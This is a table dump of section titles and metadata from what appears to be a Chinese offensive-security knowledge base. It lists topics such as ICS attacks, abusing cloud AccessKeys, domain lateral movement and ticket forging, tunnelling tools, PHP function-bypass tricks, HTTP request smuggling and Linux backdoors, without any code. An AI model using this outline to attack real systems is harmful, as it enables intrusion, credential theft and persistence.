| 1225 | 工控安全  | 工控系统安全测试用例                     | {'id': 6800, 'name': '5.1.3 电力行业 主要面临的安全风险', 'pid': 332, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6800, 'title': None}                                                                          |
| 1226 | 工控安全  | 工控系统安全测试用例                     | {'id': 6801, 'name': '5.2.1 石油化工行业 业务介绍', 'pid': 333, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6801, 'title': None}                                                                             |
| 1227 | 工控安全  | 工控系统安全测试用例                     | {'id': 6803, 'name': '5.2.2 石油化工 工控系统介绍', 'pid': 333, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6803, 'title': None}                                                                             |
| 1228 | 工控安全  | 工控系统安全测试用例                     | {'id': 6804, 'name': '5.2.3 石油化工行业 主要面临的安全风险', 'pid': 333, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6804, 'title': None}                                                                        |
| 1229 | 工控安全  | 工控系统安全测试用例                     | {'id': 6805, 'name': '5.3.1 燃气行业 业务介绍', 'pid': 334, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6805, 'title': None}                                                                               |
| 1230 | 工控安全  | 工控系统安全测试用例                     | {'id': 6806, 'name': '5.3.2 燃气行业 工控系统', 'pid': 334, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6806, 'title': None}                                                                               |
| 1231 | 工控安全  | 工控系统安全测试用例                     | {'id': 6807, 'name': '5.3.3 燃气行业 面临的主要面临的安全风险', 'pid': 334, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6807, 'title': None}                                                                       |
| 1232 | 工控安全  | 工控系统安全测试用例                     | {'id': 6812, 'name': '6.1 安全软件选择与管理防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6812, 'title': None}                                                                           |
| 1233 | 工控安全  | 工控系统安全测试用例                     | {'id': 6813, 'name': '6.2 核心装备配置和补丁升级验证评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6813, 'title': None}                                                                         |
| 1234 | 工控安全  | 工控系统安全测试用例                     | {'id': 6816, 'name': '6.3 边界安全防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6816, 'title': None}                                                                                |
| 1235 | 工控安全  | 工控系统安全测试用例                     | {'id': 6817, 'name': '6.4 身份认证防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6817, 'title': None}                                                                                |
| 1236 | 工控安全  | 工控系统安全测试用例                     | {'id': 6818, 'name': '6.5 远程访问安全防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6818, 'title': None}                                                                              |
| 1237 | 工控安全  | 工控系统安全测试用例                     | {'id': 6819, 'name': '6.6 物理和环境安全防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6819, 'title': None}                                                                             |
| 1238 | 工控安全  | 工控系统安全测试用例                     | {'id': 6820, 'name': '6.7 安全检测和应急预案演练评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6820, 'title': None}                                                                           |
| 1239 | 工控安全  | 工控系统安全测试用例                     | {'id': 6821, 'name': '6.8 资产安全防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6821, 'title': None}                                                                                |
| 1240 | 工控安全  | 工控系统安全测试用例                     | {'id': 6822, 'name': '6.9 数据安全防护评估验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6822, 'title': None}                                                                                |
| 1241 | 工控安全  | 工控系统安全测试用例                     | {'id': 6823, 'name': '6.10 落实责任防护内容验证', 'pid': 335, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6823, 'title': None}                                                                               |
| 1242 | 工控安全  | 工控系统安全测试用例                     | {'id': 6824, 'name': '7.1 构建工控系统漏洞库', 'pid': 336, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6824, 'title': None}                                                                                 |
| 1243 | 工控安全  | 工控系统安全测试用例                     | {'id': 6825, 'name': '7.2 工控系统蜜罐技术', 'pid': 336, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6825, 'title': None}                                                                                  |
| 1244 | 工控安全  | 工控系统安全测试用例                     | {'id': 6826, 'name': '7.3 自主研发模糊测试工具、资产搜集+漏洞挖掘平台', 'pid': 336, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6826, 'title': None}                                                                    |
| 1245 | 工控安全  | （大工PLC-Mac1100）PLC 远程启停攻击实验    | {'id': 6833, 'name': '（大工PLC-Mac1100）PLC 远程启停攻击实验', 'pid': 321, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6833, 'title': None}                                                                   |
| 1246 | 工控安全  | Siemens PLC 指纹提取方法汇总           | {'id': 6834, 'name': 'Siemens PLC 指纹提取方法汇总', 'pid': 321, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6834, 'title': None}                                                                          |
| 1247 | 工控安全  | PLC 工程重置漏洞研究                   | {'id': 6835, 'name': 'PLC 工程重置漏洞研究', 'pid': 321, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6835, 'title': None}                                                                                  |
| 1248 | 云安全   | 阿里云                            | {'id': 7202, 'name': '阿里云服务器地区代码对照表', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7202, 'title': None}                                                                                 |
| 1249 | 云安全   | 阿里云                            | {'id': 7205, 'name': '阿里云 弹性容器实例ECI 地域和可用区', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7205, 'title': None}                                                                          |
| 1250 | 云安全   | 阿里云                            | {'id': 7199, 'name': '阿里云 ACCESSKEY ACCESSKEYSECRET 的利用方式（一）', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7199, 'title': None}                                                        |
| 1251 | 云安全   | 阿里云                            | {'id': 7200, 'name': '阿里云 ACCESSKEY ACCESSKEYSECRET 的利用方式（二）', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7200, 'title': None}                                                        |
| 1252 | 云安全   | 阿里云                            | {'id': 7201, 'name': '阿里云 ACCESSKEY ACCESSKEYSECRET 的利用方式（三）', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7201, 'title': None}                                                        |
| 1253 | 云安全   | 阿里云                            | {'id': 7203, 'name': '阿里云 ACCESSKEY ACCESSKEYSECRET 的利用方式（四）', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7203, 'title': None}                                                        |
| 1254 | 云安全   | 阿里云                            | {'id': 7204, 'name': '阿里云 RDS 数据库的利用方式', 'pid': 434, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7204, 'title': None}                                                                              |
| 1255 | 域渗透   | 1、域的简单介绍                       | {'id': 6190, 'name': '1.1 域的简单介绍', 'pid': 180, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6190, 'title': None}                                                                                    |
| 1256 | 域渗透   | 1、域的简单介绍                       | {'id': 6191, 'name': '1.2 域优缺点', 'pid': 180, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6191, 'title': None}                                                                                      |
| 1257 | 域渗透   | 2、Kerberos 协议                  | {'id': 6192, 'name': '2.1 Kerberos 协议介绍', 'pid': 181, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6192, 'title': None}                                                                             |
| 1258 | 域渗透   | 2、Kerberos 协议                  | {'id': 6193, 'name': '2.2 Kerberos 协议框架', 'pid': 181, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6193, 'title': None}                                                                             |
| 1259 | 域渗透   | 2、Kerberos 协议                  | {'id': 6194, 'name': '2.3 Kerberos 认证流程', 'pid': 181, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6194, 'title': None}                                                                             |
| 1260 | 域渗透   | 3、域内信息收集                       | {'id': 6550, 'name': '3.4.2.1 当前域基本信息枚举', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6550, 'title': None}                                                                             |
| 1261 | 域渗透   | 3、域内信息收集                       | {'id': 6551, 'name': '3.4.2.2 域内用户信息枚举', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6551, 'title': None}                                                                              |
| 1262 | 域渗透   | 3、域内信息收集                       | {'id': 6552, 'name': '3.4.2.3 域内机器信息枚举', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6552, 'title': None}                                                                              |
| 1263 | 域渗透   | 3、域内信息收集                       | {'id': 6553, 'name': '3.4.2.4 域内组信息枚举', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6553, 'title': None}                                                                               |
| 1264 | 域渗透   | 3、域内信息收集                       | {'id': 6554, 'name': '3.4.2.5 域内敏感文件枚举', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6554, 'title': None}                                                                              |
| 1265 | 域渗透   | 3、域内信息收集                       | {'id': 6555, 'name': '3.4.2.6 GPO & OUs', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6555, 'title': None}                                                                             |
| 1266 | 域渗透   | 3、域内信息收集                       | {'id': 6556, 'name': '3.4.2.7 ACL', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6556, 'title': None}                                                                                   |
| 1267 | 域渗透   | 3、域内信息收集                       | {'id': 6557, 'name': '3.4.2.8 域信任枚举', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6557, 'title': None}                                                                                 |
| 1268 | 域渗透   | 3、域内信息收集                       | {'id': 6558, 'name': '3.4.2.9 用户搜寻', 'pid': 271, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6558, 'title': None}                                                                                  |
| 1269 | 域渗透   | 3、域内信息收集                       | {'id': 6549, 'name': '3.4.1 基本脚本模块导入', 'pid': 270, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6549, 'title': None}                                                                                |
| 1270 | 域渗透   | 3、域内信息收集                       | {'id': 6195, 'name': '3.1 判断是否是域环境', 'pid': 182, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6195, 'title': None}                                                                                  |
| 1271 | 域渗透   | 3、域内信息收集                       | {'id': 6196, 'name': '3.2 定位域控', 'pid': 182, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6196, 'title': None}                                                                                      |
| 1272 | 域渗透   | 3、域内信息收集                       | {'id': 6197, 'name': '3.3 非域信息收集', 'pid': 182, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6197, 'title': None}                                                                                    |
| 1273 | 域渗透   | 4、域内横向移动                       | {'id': 6198, 'name': '4.1.1 mimikatz', 'pid': 184, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6198, 'title': None}                                                                                |
| 1274 | 域渗透   | 4、域内横向移动                       | {'id': 6199, 'name': '4.1.2 procdump+mimikatz', 'pid': 184, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6199, 'title': None}                                                                       |
| 1275 | 域渗透   | 4、域内横向移动                       | {'id': 6200, 'name': '4.1.3 LaZagne', 'pid': 184, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6200, 'title': None}                                                                                 |
| 1276 | 域渗透   | 4、域内横向移动                       | {'id': 7207, 'name': '4.1.4 域Ntds.dit研究', 'pid': 184, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7207, 'title': None}                                                                             |
| 1277 | 域渗透   | 4、域内横向移动                       | {'id': 6201, 'name': '4.2.1.1 IPC 利用条件', 'pid': 186, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6201, 'title': None}                                                                              |
| 1278 | 域渗透   | 4、域内横向移动                       | {'id': 6202, 'name': '4.2.1.2 建立 IPC 连接、copy 文件、创建计划任务', 'pid': 186, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6202, 'title': None}                                                              |
| 1279 | 域渗透   | 4、域内横向移动                       | {'id': 6203, 'name': '4.2.1.3 IPC 常见错误', 'pid': 186, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6203, 'title': None}                                                                              |
| 1280 | 域渗透   | 4、域内横向移动                       | {'id': 6204, 'name': '4.2.1.4 PsTools', 'pid': 186, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6204, 'title': None}                                                                               |
| 1281 | 域渗透   | 4、域内横向移动                       | {'id': 6205, 'name': '4.2.2.1 WMI 利用条件', 'pid': 187, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6205, 'title': None}                                                                              |
| 1282 | 域渗透   | 4、域内横向移动                       | {'id': 6206, 'name': '4.2.2.2 利用 wmic 进行横向移动', 'pid': 187, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6206, 'title': None}                                                                        |
| 1283 | 域渗透   | 4、域内横向移动                       | {'id': 6207, 'name': '4.2.2.3 wmiexec.vbs', 'pid': 187, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6207, 'title': None}                                                                           |
| 1284 | 域渗透   | 4、域内横向移动                       | {'id': 6208, 'name': '4.2.3.1 WinRM 利用条件', 'pid': 188, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6208, 'title': None}                                                                            |
| 1285 | 域渗透   | 4、域内横向移动                       | {'id': 6209, 'name': '4.2.3.2 WINRS', 'pid': 188, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6209, 'title': None}                                                                                 |
| 1286 | 域渗透   | 4、域内横向移动                       | {'id': 6210, 'name': '4.2.3.3 Powershell Invoke-Command', 'pid': 188, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6210, 'title': None}                                                             |
| 1287 | 域渗透   | 4、域内横向移动                       | {'id': 6211, 'name': '4.2.4.1 Mimikatz', 'pid': 189, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6211, 'title': None}                                                                              |
| 1288 | 域渗透   | 4、域内横向移动                       | {'id': 6212, 'name': '4.2.4.2 impacket-examples-windows', 'pid': 189, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6212, 'title': None}                                                             |
| 1289 | 域渗透   | 4、域内横向移动                       | {'id': 6213, 'name': '4.2.5 MS14-068', 'pid': 190, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6213, 'title': None}                                                                                |
| 1290 | 域渗透   | 5、权限维持                         | {'id': 6214, 'name': '5.1.1 制作黄金票据的前提条件', 'pid': 192, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6214, 'title': None}                                                                             |
| 1291 | 域渗透   | 5、权限维持                         | {'id': 6215, 'name': '5.1.2 黄金票据利用', 'pid': 192, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6215, 'title': None}                                                                                  |
| 1292 | 域渗透   | 5、权限维持                         | {'id': 6216, 'name': '5.2.1 伪造白银票据的前提条件件', 'pid': 193, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6216, 'title': None}                                                                            |
| 1293 | 域渗透   | 5、权限维持                         | {'id': 6217, 'name': '5.2.2 白银票据的利用', 'pid': 193, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6217, 'title': None}                                                                                 |
| 1294 | 域渗透   | 5、权限维持                         | {'id': 6218, 'name': '5.3 skeleton key', 'pid': 193, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6218, 'title': None}                                                                              |
| 1295 | 安全技术  | 内网渗透                           | {'id': 6229, 'name': 'Teamviewer内网穿透（一）', 'pid': 196, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6229, 'title': None}                                                                             |
| 1296 | 安全技术  | 内网渗透                           | {'id': 6230, 'name': 'Teamviewer内网穿透（二）', 'pid': 196, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6230, 'title': None}                                                                             |
| 1297 | 安全技术  | 内网渗透                           | {'id': 6219, 'name': 'ABPTTS', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6219, 'title': None}                                                                                        |
| 1298 | 安全技术  | 内网渗透                           | {'id': 6220, 'name': 'Anydesk', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6220, 'title': None}                                                                                       |
| 1299 | 安全技术  | 内网渗透                           | {'id': 6528, 'name': 'Dnscat2', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6528, 'title': None}                                                                                       |
| 1300 | 安全技术  | 内网渗透                           | {'id': 6221, 'name': 'ew', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6221, 'title': None}                                                                                            |
| 1301 | 安全技术  | 内网渗透                           | {'id': 6222, 'name': 'frp', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6222, 'title': None}                                                                                           |
| 1302 | 安全技术  | 内网渗透                           | {'id': 6529, 'name': 'Icmpsh', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6529, 'title': None}                                                                                        |
| 1303 | 安全技术  | 内网渗透                           | {'id': 6530, 'name': 'Iodine', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6530, 'title': None}                                                                                        |
| 1304 | 安全技术  | 内网渗透                           | {'id': 6223, 'name': 'lcx', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6223, 'title': None}                                                                                           |
| 1305 | 安全技术  | 内网渗透                           | {'id': 6224, 'name': 'nc', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6224, 'title': None}                                                                                            |
| 1306 | 安全技术  | 内网渗透                           | {'id': 7070, 'name': 'Neo-reGeorg', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7070, 'title': None}                                                                                   |
| 1307 | 安全技术  | 内网渗透                           | {'id': 6532, 'name': 'Ptunnel', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6532, 'title': None}                                                                                       |
| 1308 | 安全技术  | 内网渗透                           | {'id': 6225, 'name': 'reDuh', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6225, 'title': None}                                                                                         |
| 1309 | 安全技术  | 内网渗透                           | {'id': 6531, 'name': 'Netsh', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6531, 'title': None}                                                                                         |
| 1310 | 安全技术  | 内网渗透                           | {'id': 6226, 'name': 'reGeorg', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6226, 'title': None}                                                                                       |
| 1311 | 安全技术  | 内网渗透                           | {'id': 6533, 'name': 'Socat', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6533, 'title': None}                                                                                         |
| 1312 | 安全技术  | 内网渗透                           | {'id': 6534, 'name': 'Ssh', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6534, 'title': None}                                                                                           |
| 1313 | 安全技术  | 内网渗透                           | {'id': 6227, 'name': 'ssocks', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6227, 'title': None}                                                                                        |
| 1314 | 安全技术  | 内网渗透                           | {'id': 6228, 'name': 'Tunna', 'pid': 195, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6228, 'title': None}                                                                                         |
| 1315 | 安全技术  | 内网渗透                           | {'id': 6231, 'name': 'Bypass金山毒霸', 'pid': 197, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6231, 'title': None}                                                                                    |
| 1316 | 安全技术  | 内网渗透                           | {'id': 6232, 'name': 'DBscanner', 'pid': 197, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6232, 'title': None}                                                                                     |
| 1317 | 安全技术  | 内网渗透                           | {'id': 6233, 'name': 'Windows常用程序密码读取工具', 'pid': 197, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6233, 'title': None}                                                                             |
| 1318 | 安全技术  | 内网渗透                           | {'id': 6234, 'name': '内网渗透之获取windows远程桌面（RDP）连接记录', 'pid': 197, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6234, 'title': None}                                                                   |
| 1319 | 安全技术  | 内网渗透                           | {'id': 6235, 'name': '利用windows api dump进程', 'pid': 197, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6235, 'title': None}                                                                          |
| 1320 | 安全技术  | 内网渗透                           | {'id': 7025, 'name': '解密浏览器历史记录', 'pid': 197, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7025, 'title': None}                                                                                     |
| 1321 | 安全技术  | Disable function               | {'id': 6237, 'name': ' mail ', 'pid': 200, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6237, 'title': None}                                                                                        |
| 1322 | 安全技术  | Disable function               | {'id': 6238, 'name': ' error\_log ', 'pid': 200, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6238, 'title': None}                                                                                  |
| 1323 | 安全技术  | Disable function               | {'id': 6239, 'name': ' imagemagick+GhostScript ', 'pid': 200, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6239, 'title': None}                                                                     |
| 1324 | 安全技术  | Disable function               | {'id': 6236, 'name': ' 常规绕过 ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6236, 'title': None}                                                                                        |
| 1325 | 安全技术  | Disable function               | {'id': 6240, 'name': ' 利用 pcntl\_exec 绕过 ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6240, 'title': None}                                                                           |
| 1326 | 安全技术  | Disable function               | {'id': 6241, 'name': ' 利用 imap\_open函数任意命令执行 ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6241, 'title': None}                                                                       |
| 1327 | 安全技术  | Disable function               | {'id': 6242, 'name': ' 利用系统组件 window com 绕过 ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6242, 'title': None}                                                                        |
| 1328 | 安全技术  | Disable function               | {'id': 6243, 'name': ' 利用 Apache+mod\_cgi+.htaccess 绕过 ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6243, 'title': None}                                                             |
| 1329 | 安全技术  | Disable function               | {'id': 6244, 'name': ' 利用 ImageMagick 漏洞绕过（一） ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6244, 'title': None}                                                                      |
| 1330 | 安全技术  | Disable function               | {'id': 6245, 'name': ' 利用 ImageMagick 漏洞绕过（二） ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6245, 'title': None}                                                                      |
| 1331 | 安全技术  | Disable function               | {'id': 6246, 'name': ' 利用 ShellShock 绕过 ', 'pid': 199, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6246, 'title': None}                                                                            |
| 1332 | 安全技术  | Http 请求走私                      | {'id': 6248, 'name': 'CL不为0的GET请求', 'pid': 202, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6248, 'title': None}                                                                                   |
| 1333 | 安全技术  | Http 请求走私                      | {'id': 6249, 'name': 'CL-CL', 'pid': 202, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6249, 'title': None}                                                                                         |
| 1334 | 安全技术  | Http 请求走私                      | {'id': 6250, 'name': 'CL-TE', 'pid': 202, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6250, 'title': None}                                                                                         |
| 1335 | 安全技术  | Http 请求走私                      | {'id': 6251, 'name': 'TE-CL', 'pid': 202, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6251, 'title': None}                                                                                         |
| 1336 | 安全技术  | Http 请求走私                      | {'id': 6252, 'name': 'TE-TE', 'pid': 202, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6252, 'title': None}                                                                                         |
| 1337 | 安全技术  | Http 请求走私                      | {'id': 6253, 'name': '简介', 'pid': 204, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6253, 'title': None}                                                                                            |
| 1338 | 安全技术  | Http 请求走私                      | {'id': 6254, 'name': 'CL-TE绕过前端服务器安全控制', 'pid': 204, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6254, 'title': None}                                                                              |
| 1339 | 安全技术  | Http 请求走私                      | {'id': 6255, 'name': 'TE-CL绕过前端服务器安全控制', 'pid': 204, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6255, 'title': None}                                                                              |
| 1340 | 安全技术  | Http 请求走私                      | {'id': 6256, 'name': '利用请求走私获取前端服务器重写请求字段', 'pid': 204, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6256, 'title': None}                                                                           |
| 1341 | 安全技术  | Http 请求走私                      | {'id': 6257, 'name': '利用请求走私捕获其他用户的请求', 'pid': 204, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6257, 'title': None}                                                                               |
| 1342 | 安全技术  | Http 请求走私                      | {'id': 6258, 'name': '利用请求走私传入XSS', 'pid': 204, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6258, 'title': None}                                                                                   |
| 1343 | 安全技术  | Http 请求走私                      | {'id': 6247, 'name': ' Http 请求走私产生原因 ', 'pid': 201, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6247, 'title': None}                                                                               |
| 1344 | 安全技术  | Linux后门                        | {'id': 6260, 'name': ' SSH wrapper ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6260, 'title': None}                                                                                 |
| 1345 | 安全技术  | Linux后门                        | {'id': 6261, 'name': ' SSH 软连接后门 ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6261, 'title': None}                                                                                   |
| 1346 | 安全技术  | Linux后门                        | {'id': 6262, 'name': ' SSH 公钥免密登陆 ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6262, 'title': None}                                                                                  |
| 1347 | 安全技术  | Linux后门                        | {'id': 6263, 'name': ' SSH Keylogger ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6263, 'title': None}                                                                               |
| 1348 | 安全技术  | Linux后门                        | {'id': 6264, 'name': ' strace监听ssh来源流量 ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6264, 'title': None}                                                                             |
| 1349 | 安全技术  | Linux后门                        | {'id': 6265, 'name': ' Cron后门 ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6265, 'title': None}                                                                                      |
| 1350 | 安全技术  | Linux后门                        | {'id': 6266, 'name': ' hiding-from-cats ', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6266, 'title': None}                                                                            |
| 1351 | 安全技术  | Linux后门                        | {'id': 7295, 'name': 'Linux PAM 万能密码登陆', 'pid': 206, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7295, 'title': None}                                                                              |
| 1352 | 安全技术  | Linux后门                        | {'id': 6267, 'name': ' （CVE-2019-12735）vim modeline ', 'pid': 207, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6267, 'title': None}                                                                |
| 1353 | 安全技术  | Linux后门                        | {'id': 6268, 'name': ' vim python 拓展后门 ', 'pid': 207, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6268, 'title': None}                                                                             |
| 1354 | 安全技术  | Linux后门                        | {'id': 6269, 'name': ' 建立隐藏文件/文件夹 ', 'pid': 208, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6269, 'title': None}                                                                                  |
| 1355 | 安全技术  | Linux后门                        | {'id': 6270, 'name': ' 建立..文件/文件夹 ', 'pid': 208, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6270, 'title': None}                                                                                  |
| 1356 | 安全技术  | Linux后门                        | {'id': 6271, 'name': ' 参数混淆拦截rm ', 'pid': 208, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6271, 'title': None}                                                                                    |
| 1357 | 安全技术  | Linux后门                        | {'id': 6272, 'name': ' 创建不能删除的文件 ', 'pid': 208, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6272, 'title': None}                                                                                   |
| 1358 | 安全技术  | Linux后门                        | {'id': 6273, 'name': ' 隐藏历史操作命令 ', 'pid': 208, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6273, 'title': None}                                                                                    |
| 1359 | 安全技术  | Linux后门                        | {'id': 6274, 'name': ' LKM Linux rootkit后门 ', 'pid': 208, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6274, 'title': None}                                                                         |
| 1360 | 安全技术  | Linux后门                        | {'id': 6275, 'name': 'passwd写入', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6275, 'title': None}                                                                                      |
| 1361 | 安全技术  | Linux后门                        | {'id': 6276, 'name': 'uid 0用户添加', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6276, 'title': None}                                                                                     |
| 1362 | 安全技术  | Linux后门                        | {'id': 6277, 'name': 'suid 后门', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6277, 'title': None}                                                                                       |
| 1363 | 安全技术  | Linux后门                        | {'id': 6278, 'name': 'reverse\_shell', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6278, 'title': None}                                                                                |
| 1364 | 安全技术  | Linux后门                        | {'id': 6279, 'name': 'sudoers利用', 'pid': 210, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6279, 'title': None}                                                                                     |
